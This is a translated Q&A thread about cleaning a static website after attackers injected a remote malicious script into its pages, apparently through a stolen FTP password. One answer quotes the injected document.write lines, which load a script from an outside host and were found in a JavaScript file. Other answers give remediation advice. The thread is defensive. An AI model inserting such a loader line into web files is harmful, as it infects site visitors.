html - 弊社のhtmlサイトに謎のURL

Question

静的な html Web サイトhttp://www.ifort.comのホームページが、謎の Web サイト rawalrohi.com からデータを転送しています。これは、iffort.com にアクセスして、そこのフッターに注目することで確認できます。rawalrohi.com からデータを転送すると書かれています。

私たちの側から、問題を修正するために次のことを行いました

a.) すべてのページのソースコードを分析します。コードを確認したところ、スクリプト src= http://rawalrohi.com/images/ART.phpがすべてのページに挿入されていることがわかりました。ウェブサイトのすべての「html」ページからこのスクリプトを削除しました

b.) 次に、ホスティング会社に話を聞いたところ、サイトのバックアップを提供できるとのことでした。バックアップはありますが、サイトの復元には使用していません。

c.) 最後に、誰かが私たちの FTP パスワードをハッキングした可能性があると言われたので、FTP パスワードを変更しました。

これを行っているにもかかわらず、ホームページにはまだ rawalrohi.com からデータを転送していると書かれています。ビュー ソースは URL を明らかにしません。これにより、ウェブサイトの速度が低下しています。

どんな助けでも大歓迎です。

Answer 1

あなたのページは「js/hyperlinked_Images.js」というファイルを参照しています。このファイルの一番下にあるファイルを見てください。

...
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');

すみませんが、私のシステムでクイック AV スキャンを実行します ;)

Answer 2

すべてに1つのFTPアカウントを使用しないように注意し、FTPユーザーコントロールを制御してください。これは、Webサイトの管理に役立ちます。

Answer 3

私はしばらく前に同様の振る舞いを見てきました。その特定のケースでは、ftpパスワードが侵害されました。保存されたftpパスワードを収集したマルウェアによって、クライアントのデスクトップPCから読み取られました。

これは、パスワードが変更され、数日以内に再び侵害された後に初めて発見されました。

したがって、適切なAVスキャナーを使用してftpパスワードを「知っている」すべてのマシンをスキャンするようにしてください。

Answer 4

アンチウイルスを使用していることを確認してください。あなたのウェブサイトがアドウェアやスパイウェアのような面白い外部スクリプトをロードするときはいつでも、あなたのアンチウイルスはあなたに警告します。

Answer 5

私は最近、クライアントの Web サイトでこれを見ました。URL は異なりますが、同じ種類のコード インジェクションがすべてのファイルに含まれていました。この問題を解決するために、サイトをダウンロードし、Visual Studio を使用してサイト全体で文字列の "検索と置換" を実行しました。これで問題は解決しました。すべてのファイルに対して同様のことを行うことをお勧めします。私のクライアント サイトには、すべて感染した html/htm/aspx ファイルがありました。ISP は、FTP パスワードがおそらく侵害された可能性があるという同じ声明を出しました...

Answer 6

あなたのサイトはスキャンしませんでしたが、WordPress、Drupal、Joomla などの標準的なソフトウェアをウェブサイトで使用している場合は、常に最新の状態に保つ必要があります。彼らのセキュリティ アラートに登録し、更新が表示されるたびに、行っていることをすべて削除して更新します。

ハッカーは常にインターネットをスキャンして、脆弱な Web サイトを探しています。脆弱なサイトに感染するのにほんの一瞬しかかかりません。

また、すべてのプラグイン、アドオン、コンポーネント、モジュール、貢献なども更新してください。

そうしないと、これを何度も掃除することになります。